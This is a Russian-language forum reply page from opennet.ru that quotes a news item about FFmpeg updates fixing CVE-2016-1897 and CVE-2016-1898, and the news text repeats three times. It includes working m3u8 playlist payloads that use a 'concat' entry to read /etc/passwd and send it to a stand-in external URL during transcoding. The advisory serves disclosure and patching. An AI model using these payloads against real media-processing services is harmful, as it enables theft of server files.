forum.opennet.ru

Составление сообщения

Исходное сообщение

"Обновление FFmpeg с устранением опасных уязвимостей"
Отправлено opennews, 16-Янв-16 19:17

Доступны (http://ffmpeg.org/download.html) корректирующие обновления мультимедиа-пакета FFmpeg 2.8.5, 2.7.5, 2.6.7 и 2.5.10, в которых устранены (http://git.videolan.org/?p=ffmpeg.git;a=commit;h=e183075dc11...) опасные уязвимости (http://www.slideshare.net/MailRuGroup/security-meetup-22-mailru) (CVE-2016-1897, CVE-2016-1898), которые могут привести к выгрузке произвольных файлов в случае обработки специально оформленных файлов утилитами ffmpeg, ffprobe, avconv и avprobe. Например, уязвимость представляет угрозу сервисам, в которых осуществляется перекодирование или обработка поступающих от пользователей файлов при помощи ffmpeg/libav, и файловым менеджерам, использующим ffmpeg/libav для создания эскизов.

Уязвимость может использоваться для подстановки (https://github.com/ctfs/write-ups-2015/tree/master/9447-ctf-...) содержания произвольного локального файла в результат перекодирования или для отправки (http://habrahabr.ru/company/mailru/blog/274855) на произвольный внешний URL. Например, можно передать для обработки файл с произвольным расширением (avi, mov и т.п.), в котором добавить заголовок и данные плейлиста в формате HLS m3u8, указав в качестве одного из элементов блок "concat" с внешним URL и локальным файлом, например:

<font color="#461b7e">
   #EXTM3U
   #EXT-X-MEDIA-SEQUENCE:0
   #EXTINF:10.0,
   concat:http://test.com/header.m3u8|file:///etc/passwd
   #EXT-X-ENDLIST
</font>

В результате обработки данного файла ffmpeg загрузит http://test.com/header.m3u8, который может содержать:

<font color="#461b7e">
   #EXTM3U
   #EXT-X-MEDIA-SEQUENCE:0
   #EXTINF:,
   http://example.org?
</font>
После обработки header.m3u8 ffmpeg передаст содержимое file:///etc/passwd в составе запроса на URL "http://example.org". Если вместо операции concat в переданном для обработки файле ограничиться указанием file:///etc/test.txt, то будет создан мультимедийный файл, включающий первую строку указанного локального файла.

<center><iframe src="//www.slideshare.net/slideshow/embed_code/key/E8vCNOzffF2gs0" width="595" height="485" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" style="border:1px solid #CCC; border-width:1px; margin-bottom:5px; max-width: 100%;" allowfullscreen></iframe></center>
<center><iframe width="640" height="360" src="https://www.youtube.com/embed/HRNPnbxrSCo?rel=0" frameborder="0" allowfullscreen></iframe></center>
URL: https://twitter.com/FFmpeg/status/688187976132603904
Новость: http://www.opennet.ru/opennews/art.shtml?num=43685

Исходное сообщение
"Обновление FFmpeg с устранением опасных уязвимостей" Отправлено opennews, 16-Янв-16 19:17
Доступны (http://ffmpeg.org/download.html) корректирующие обновления мультимедиа-пакета FFmpeg 2.8.5, 2.7.5, 2.6.7 и 2.5.10, в которых устранены (http://git.videolan.org/?p=ffmpeg.git;a=commit;h=e183075dc11...) опасные уязвимости (http://www.slideshare.net/MailRuGroup/security-meetup-22-mailru) (CVE-2016-1897, CVE-2016-1898), которые могут привести к выгрузке произвольных файлов в случае обработки специально оформленных файлов утилитами ffmpeg, ffprobe, avconv и avprobe. Например, уязвимость представляет угрозу сервисам, в которых осуществляется перекодирование или обработка поступающих от пользователей файлов при помощи ffmpeg/libav, и файловым менеджерам, использующим ffmpeg/libav для создания эскизов. Уязвимость может использоваться для подстановки (https://github.com/ctfs/write-ups-2015/tree/master/9447-ctf-...) содержания произвольного локального файла в результат перекодирования или для отправки (http://habrahabr.ru/company/mailru/blog/274855) на произвольный внешний URL. Например, можно передать для обработки файл с произвольным расширением (avi, mov и т.п.), в котором добавить заголовок и данные плейлиста в формате HLS m3u8, указав в качестве одного из элементов блок "concat" с внешним URL и локальным файлом, например: <font color="#461b7e"> #EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://test.com/header.m3u8\|file:///etc/passwd #EXT-X-ENDLIST </font> В результате обработки данного файла ffmpeg загрузит http://test.com/header.m3u8, который может содержать: <font color="#461b7e"> #EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:, http://example.org? </font> После обработки header.m3u8 ffmpeg передаст содержимое file:///etc/passwd в составе запроса на URL "http://example.org". Если вместо операции concat в переданном для обработки файле ограничиться указанием file:///etc/test.txt, то будет создан мультимедийный файл, включающий первую строку указанного локального файла. <center><iframe src="//www.slideshare.net/slideshow/embed_code/key/E8vCNOzffF2gs0" width="595" height="485" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" style="border:1px solid #CCC; border-width:1px; margin-bottom:5px; max-width: 100%;" allowfullscreen></iframe></center> <center><iframe width="640" height="360" src="https://www.youtube.com/embed/HRNPnbxrSCo?rel=0" frameborder="0" allowfullscreen></iframe></center> URL: https://twitter.com/FFmpeg/status/688187976132603904 Новость: http://www.opennet.ru/opennews/art.shtml?num=43685

Ваше сообщение

Имя*:

EMail:

Для отправки ответов на email укажите знак ! перед адресом, например, !user@host.ru (!! - не показывать email).
Более тонкая настройка отправки ответов производится в профиле зарегистрированного участника форума.

Заголовок*:

Сообщение*:

> Доступны (http://ffmpeg.org/download.html) корректирующие обновления мультимедиа-пакета 
> FFmpeg 2.8.5, 2.7.5, 2.6.7 и 2.5.10, в которых устранены (http://git.videolan.org/?p=ffmpeg.git;a=commit;h=e183075dc11b2033f3f84bf8c94bd4b31266e90d) 
> опасные уязвимости (http://www.slideshare.net/MailRuGroup/security-meetup-22-mailru) 
> (CVE-2016-1897, CVE-2016-1898), которые могут привести к выгрузке произвольных файлов 
> в случае обработки специально оформленных файлов утилитами ffmpeg, ffprobe, avconv и 
> avprobe. Например, уязвимость представляет угрозу сервисам, в которых осуществляется 
> перекодирование или обработка поступающих от пользователей файлов при помощи ffmpeg/libav, 
> и файловым менеджерам, использующим ffmpeg/libav для создания эскизов.

> Уязвимость может использоваться для подстановки (https://github.com/ctfs/write-ups-2015/tree/master/9447-ctf-2015/web/super-turbo-atomic-gif-converter) 
> содержания произвольного локального файла в результат перекодирования или для отправки 
> (http://habrahabr.ru/company/mailru/blog/274855) на произвольный внешний URL. Например, 
> можно передать для обработки файл с произвольным расширением (avi, mov и 
> т.п.), в котором добавить заголовок и данные плейлиста в формате HLS 
> m3u8, указав в качестве одного из элементов блок "concat" с внешним 
> URL и локальным файлом, например:

> <font color="#461b7e"> 
>    #EXTM3U 
>    #EXT-X-MEDIA-SEQUENCE:0 
>    #EXTINF:10.0, 
>    concat:http://test.com/header.m3u8|file:///etc/passwd 
>    #EXT-X-ENDLIST

> </font>

> В результате обработки данного файла ffmpeg загрузит http://test.com/header.m3u8, который 
> может содержать:

> <font color="#461b7e"> 
>    #EXTM3U 
>    #EXT-X-MEDIA-SEQUENCE:0 
>    #EXTINF:, 
>    http://example.org?
> </font>

> После обработки header.m3u8 ffmpeg передаст содержимое file:///etc/passwd в составе запроса 
> на URL "http://example.org". Если вместо операции concat в переданном для обработки 
> файле ограничиться указанием file:///etc/test.txt, то будет создан мультимедийный файл, 
> включающий первую строку указанного локального файла.

> <center><iframe src="//www.slideshare.net/slideshow/embed_code/key/E8vCNOzffF2gs0" 
> width="595" height="485" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" 
> style="border:1px solid #CCC; border-width:1px; margin-bottom:5px; max-width: 100%;" 
> allowfullscreen></iframe></center> 
> <center><iframe width="640" height="360" src="https://www.youtube.com/embed/HRNPnbxrSCo?rel=0" 
> frameborder="0" allowfullscreen></iframe></center>

> URL: https://twitter.com/FFmpeg/status/688187976132603904 
> Новость: http://www.opennet.ru/opennews/art.shtml?num=43685

При общении не допускается: неуважительное отношение к собеседнику, хамство, унизительное обращение, ненормативная лексика, переход на личности, агрессивное поведение, обесценивание собеседника, провоцирование флейма голословными и заведомо ложными заявлениями. Не отвечайте на сообщения, явно нарушающие правила - удаляются не только сами нарушения, но и все ответы на них. Лог модерирования.

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру